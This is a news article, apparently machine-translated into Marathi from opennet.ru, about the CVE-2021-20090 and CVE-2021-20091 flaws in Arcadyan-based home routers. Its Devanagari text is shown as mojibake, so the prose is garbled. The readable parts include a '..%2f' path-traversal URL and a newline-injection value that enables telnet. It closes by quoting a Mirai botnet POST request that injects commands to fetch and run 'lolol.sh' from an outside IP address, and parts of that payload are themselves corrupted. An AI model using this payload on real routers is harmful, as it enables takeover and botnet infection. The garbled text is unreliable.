рд╣реЛрдо рд░рд╛рдЙрдЯрд░рд╡рд░ рдиреЗрдЯрд╡рд░реНрдХрд╡рд░ рдПрдХ рдореЛрдард╛ рд╣рд▓реНрд▓рд╛ рдиреЛрдВрджрд╡рд▓рд╛ рдЧреЗрд▓рд╛ рдЖрд╣реЗ рдЬреНрдпрд╛рдВрдЪреЗ рдлрд░реНрдорд╡реЗрдЕрд░ рдЖрд░реНрдХреЗрдбрд┐рдпрди рдХрдВрдкрдиреАрдХрдбреВрди HTTP рд╕рд░реНрд╡реНрд╣рд░ рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреА рд╡рд╛рдкрд░рддреЗ. рдбрд┐рд╡реНрд╣рд╛рдЗрд╕реЗрд╕рд╡рд░ рдирд┐рдпрдВрддреНрд░рдг рдорд┐рд│рд╡рд┐рдгреНрдпрд╛рд╕рд╛рдареА, рджреЛрди рднреЗрджреНрдпрддреЗрдЪреЗ рд╕рдВрдпреЛрдЬрди рд╡рд╛рдкрд░рд▓реЗ рдЬрд╛рддреЗ рдЬреЗ рдореВрд│ рдЕрдзрд┐рдХрд╛рд░рд╛рдВрд╕рд╣ рдЕрдирд┐рдпрдВрддреНрд░рд┐рдд рдХреЛрдбрдЪреА рджреВрд░рд╕реНрде рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреА рдХрд░рдгреНрдпрд╛рд╕ рдЕрдиреБрдорддреА рджреЗрддреЗ. рд╕рдорд╕реНрдпрд╛ Arcadyan, ASUS рдЖрдгрд┐ Buffalo рдХрдбреАрд▓ ADSL рд░рд╛рдЙрдЯрд░рдЪреНрдпрд╛ рд╡рд┐рд╕реНрддреГрдд рд╢реНрд░реЗрдгреАрд╡рд░, рддрд╕реЗрдЪ Beeline рдмреНрд░рдБрдб рдЕрдВрддрд░реНрдЧрдд рдкреБрд░рд╡рд▓реЗрд▓реНрдпрд╛ рдЙрдкрдХрд░рдгрд╛рдВрд╡рд░ (рд╕рдорд╕реНрдпрд╛ рд╕реНрдорд╛рд░реНрдЯ рдмреЙрдХреНрд╕ рдлреНрд▓реЕрд╢рдордзреНрдпреЗ рдкреБрд╖реНрдЯреА рдХреЗрд▓реА рдЖрд╣реЗ), рдбреНрдпреВрд╢ рдЯреЗрд▓рд┐рдХреЙрдо, рдСрд░реЗрдВрдЬ, O2, рдЯреЗрд▓рд╕, рд╡реНрд╣реЗрд░рд┐рдЭреЙрди, рд╡реНрд╣реЛрдбрд╛рдлреЛрди рдЖрдгрд┐ рдЗрддрд░ рджреВрд░рд╕рдВрдЪрд╛рд░ рдСрдкрд░реЗрдЯрд░. Arcadyan рдлрд░реНрдорд╡реЗрдЕрд░рдордзреНрдпреЗ рд╣реА рд╕рдорд╕реНрдпрд╛ 10 рд╡рд░реНрд╖рд╛рдВрд╣реВрди рдЕрдзрд┐рдХ рдХрд╛рд│ рдЙрдкрд╕реНрдерд┐рдд рдЖрд╣реЗ рдЖрдгрд┐ рдпрд╛ рдХрд╛рд│рд╛рдд 20 рднрд┐рдиреНрди рдЙрддреНрдкрд╛рджрдХрд╛рдВрдХрдбреВрди рдХрдореАрддрдХрдореА 17 рдбрд┐рд╡реНрд╣рд╛рдЗрд╕ рдореЙрдбреЗрд▓реНрд╕рд╡рд░ рд╕реНрдерд▓рд╛рдВрддрд░рд┐рдд рдХрд░рдгреНрдпрд╛рдд рдпрд╢ рдЖрд▓реЗ рдЖрд╣реЗ.
рдкрд╣рд┐рд▓реА рдЕрд╕реБрд░рдХреНрд╖рд╛, CVE-2021-20090, рдкреНрд░рдорд╛рдгреАрдХрд░рдгрд╛рд╢рд┐рд╡рд╛рдп рдХреЛрдгрддреНрдпрд╛рд╣реА рд╡реЗрдм рдЗрдВрдЯрд░рдлреЗрд╕ рд╕реНрдХреНрд░рд┐рдкреНрдЯрдордзреНрдпреЗ рдкреНрд░рд╡реЗрд╢ рдХрд░рдгреЗ рд╢рдХреНрдп рдХрд░рддреЗ. рдЕрд╕реБрд░рдХреНрд╖рд┐рддрддреЗрдЪреЗ рд╕рд╛рд░ рд╣реЗ рдЖрд╣реЗ рдХреА рд╡реЗрдм рдЗрдВрдЯрд░рдлреЗрд╕рдордзреНрдпреЗ, рдХрд╛рд╣реА рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдЬреНрдпрд╛рджреНрд╡рд╛рд░реЗ рдкреНрд░рддрд┐рдорд╛, CSS рдлрд╛рдпрд▓реА рдЖрдгрд┐ JavaScript рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдкрд╛рдард╡рд┐рд▓реНрдпрд╛ рдЬрд╛рддрд╛рдд рддреНрдпрд╛ рдкреНрд░рдорд╛рдгреАрдХрд░рдгрд╛рд╢рд┐рд╡рд╛рдп рдкреНрд░рд╡реЗрд╢рдпреЛрдЧреНрдп рдЖрд╣реЗрдд. рдпрд╛ рдкреНрд░рдХрд░рдгрд╛рдд, рдЬреНрдпрд╛ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рдВрдирд╛ рдкреНрд░рдорд╛рдгреАрдХрд░рдгрд╛рд╢рд┐рд╡рд╛рдп рдкреНрд░рд╡реЗрд╢ рдХрд░рдгреНрдпрд╛рдЪреА рдкрд░рд╡рд╛рдирдЧреА рдЖрд╣реЗ рддреЗ рдкреНрд░рд╛рд░рдВрднрд┐рдХ рдореБрдЦрд╡рдЯрд╛ рд╡рд╛рдкрд░реВрди рддрдкрд╛рд╕рд▓реЗ рдЬрд╛рддрд╛рдд. рдкреЕрд░реЗрдВрдЯ рдбрд┐рд░реЗрдХреНрдЯрд░реАрдордзреНрдпреЗ рдЬрд╛рдгреНрдпрд╛рд╕рд╛рдареА рдкрд╛рдердордзреНрдпреЗ тАЬ../тАЭ рд╡рд░реНрдг рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рдгреЗ рдлрд░реНрдорд╡реЗрдЕрд░рджреНрд╡рд╛рд░реЗ рдЕрд╡рд░реЛрдзрд┐рдд рдХреЗрд▓реЗ рдЖрд╣реЗ, рдкрд░рдВрддреБ тАЬ..%2fтАЭ рд╕рдВрдпреЛрдЬрди рд╡рд╛рдкрд░рдгреЗ рд╡рдЧрд│рд▓реЗ рдЖрд╣реЗ. рдЕрд╢рд╛ рдкреНрд░рдХрд╛рд░реЗ, тАЬhttp://192.168.1.1/images/..%2findex.htmтАЭ рд╕рд╛рд░рдЦреНрдпрд╛ рд╡рд┐рдирдВрддреНрдпрд╛ рдкрд╛рдард╡рддрд╛рдирд╛ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкреГрд╖реНрдареЗ рдЙрдШрдбрдгреЗ рд╢рдХреНрдп рдЖрд╣реЗ.
рджреБрд╕рд░реА рднреЗрджреНрдпрддрд╛, CVE-2021-20091, рдкреНрд░рдорд╛рдгреАрдХреГрдд рд╡рд╛рдкрд░рдХрд░реНрддреНрдпрд╛рд▓рд╛ app_abstract.cgi рд╕реНрдХреНрд░рд┐рдкреНрдЯрд╡рд░ рд╡рд┐рд╢реЗрд╖ рд╕реНрд╡рд░реВрдкрд┐рдд рдкреЕрд░рд╛рдореАрдЯрд░реНрд╕ рдкрд╛рдард╡реВрди рдбрд┐рд╡реНрд╣рд╛рдЗрд╕рдЪреНрдпрд╛ рд╕рд┐рд╕реНрдЯрдо рд╕реЗрдЯрд┐рдВрдЧреНрдЬрдордзреНрдпреЗ рдмрджрд▓ рдХрд░рдгреНрдпрд╛рдЪреА рдкрд░рд╡рд╛рдирдЧреА рджреЗрддреЗ, рдЬреЗ рдкреЕрд░рд╛рдореАрдЯрд░реНрд╕рдордзреНрдпреЗ рдирд╡реАрди рд░реЗрдЦрд╛ рд╡рд░реНрдгрд╛рдЪреА рдЙрдкрд╕реНрдерд┐рддреА рддрдкрд╛рд╕рдд рдирд╛рд╣реА. . рдЙрджрд╛рд╣рд░рдгрд╛рд░реНрде, рдкрд┐рдВрдЧ рдСрдкрд░реЗрд╢рди рдХрд░рдд рдЕрд╕рддрд╛рдирд╛, рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛ рдлреАрд▓реНрдбрдордзреНрдпреЗ тАЬ192.168.1.2%0AARC_SYS_TelnetdEnable=1тАЭ рдореВрд▓реНрдп рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░реВ рд╢рдХрддреЛ рдЬреНрдпрд╛рдордзреНрдпреЗ IP рдкрддреНрддрд╛ рддрдкрд╛рд╕рд▓рд╛ рдЬрд╛рддреЛ рдЖрдгрд┐ рд╕реЗрдЯрд┐рдВрдЧреНрдЬ рдлрд╛рдЗрд▓ /tmp/etc/config/ рддрдпрд╛рд░ рдХрд░рддрд╛рдирд╛ рд╕реНрдХреНрд░рд┐рдкреНрдЯ .glbcfg, рддреНрдпрд╛рдд тАЬAARC_SYS_TelnetdEnable=1тАЭ рд╣реА рдУрд│ рд▓рд┐рд╣реЗрд▓, рдЬреА рдЯреЗрд▓рдиреЗрдЯ рд╕рд░реНрд╡реНрд╣рд░ рд╕рдХреНрд░рд┐рдп рдХрд░рддреЗ, рдЬреЗ рд░реВрдЯ рдЕрдзрд┐рдХрд╛рд░рд╛рдВрд╕рд╣ рдЕрдирд┐рд░реНрдмрдВрдз рдХрдорд╛рдВрдб рд╢реЗрд▓ рдкреНрд░рд╡реЗрд╢ рдкреНрд░рджрд╛рди рдХрд░рддреЗ. рддреНрдпрд╛рдЪрдкреНрд░рдорд╛рдгреЗ, AARC_SYS рдкреЕрд░рд╛рдореАрдЯрд░ рд╕реЗрдЯ рдХрд░реВрди, рддреБрдореНрд╣реА рд╕рд┐рд╕реНрдЯрдорд╡рд░ рдХреЛрдгрддрд╛рд╣реА рдХреЛрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░реВ рд╢рдХрддрд╛. рдкрд╣рд┐рд▓реА рднреЗрджреНрдпрддрд╛ "/images/..%2fapply_abstract.cgi" рдореНрд╣рдгреВрди рдкреНрд░рд╡реЗрд╢ рдХрд░реВрди рдкреНрд░рдорд╛рдгреАрдХрд░рдгрд╛рд╢рд┐рд╡рд╛рдп рд╕рдорд╕реНрдпрд╛рдкреНрд░рдзрд╛рди рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЪрд╛рд▓рд╡рдгреЗ рд╢рдХреНрдп рдХрд░рддреЗ.
рднреЗрджреНрдпрддреЗрдЪрд╛ рдлрд╛рдпрджрд╛ рдШреЗрдгреНрдпрд╛рд╕рд╛рдареА, рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдиреЗ рдиреЗрдЯрд╡рд░реНрдХ рдкреЛрд░реНрдЯрд╡рд░ рд╡рд┐рдирдВрддреА рдкрд╛рдард╡рд┐рдгреНрдпрд╛рд╕ рд╕рдХреНрд╖рдо рдЕрд╕рдгреЗ рдЖрд╡рд╢реНрдпрдХ рдЖрд╣реЗ рдЬреНрдпрд╛рд╡рд░ рд╡реЗрдм рдЗрдВрдЯрд░рдлреЗрд╕ рдЪрд╛рд▓реВ рдЖрд╣реЗ. рд╣рд▓реНрд▓реНрдпрд╛рдЪреНрдпрд╛ рдкреНрд░рд╕рд╛рд░рд╛рдЪреНрдпрд╛ рдЧрддрд┐рд╢реАрд▓рддреЗрдЪрд╛ рдЖрдзрд╛рд░ рдШреЗрдд, рд╕рдорд░реНрдерди рд╕реЗрд╡реЗрджреНрд╡рд╛рд░реЗ рд╕рдорд╕реНрдпрд╛рдВрдЪреЗ рдирд┐рджрд╛рди рд╕реБрд▓рдн рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдЕрдиреЗрдХ рдСрдкрд░реЗрдЯрд░ рдмрд╛рд╣реНрдп рдиреЗрдЯрд╡рд░реНрдХрд╡рд░реВрди рддреНрдпрд╛рдВрдЪреНрдпрд╛ рдбрд┐рд╡реНрд╣рд╛рдЗрд╕реЗрд╕рд╡рд░ рдкреНрд░рд╡реЗрд╢ рд╕реЛрдбрддрд╛рдд. рдЗрдВрдЯрд░рдлреЗрд╕рдордзреНрдпреЗ рдкреНрд░рд╡реЗрд╢ рдХреЗрд╡рд│ рдЕрдВрддрд░реНрдЧрдд рдиреЗрдЯрд╡рд░реНрдХрдкреБрд░рддрд╛рдЪ рдорд░реНрдпрд╛рджрд┐рдд рдЕрд╕рд▓реНрдпрд╛рд╕, "DNS рд░реАрдмрд╛рдЗрдВрдбрд┐рдВрдЧ" рддрдВрддреНрд░рд╛рдЪрд╛ рд╡рд╛рдкрд░ рдХрд░реВрди рдмрд╛рд╣реНрдп рдиреЗрдЯрд╡рд░реНрдХрд╡рд░реВрди рд╣рд▓реНрд▓рд╛ рдХреЗрд▓рд╛ рдЬрд╛рдК рд╢рдХрддреЛ. Mirai botnet рд▓рд╛ рд░рд╛рдЙрдЯрд░ рдХрдиреЗрдХреНрдЯ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдЕрд╕реБрд░рдХреНрд╖рд╛ рдЖрдзреАрдЪ рд╕рдХреНрд░рд┐рдпрдкрдгреЗ рд╡рд╛рдкрд░рд▓реНрдпрд╛ рдЬрд╛рдд рдЖрд╣реЗрдд: POST /images/..%2fapply_abstract.cgi HTTP/1.1 рдХрдиреЗрдХреНрд╢рди: рдмрдВрдж рд╡рд╛рдкрд░рдХрд░реНрддрд╛-рдПрдЬрдВрдЯ: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_address=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
рд╕реНрддреНрд░реЛрдд: opennet.ru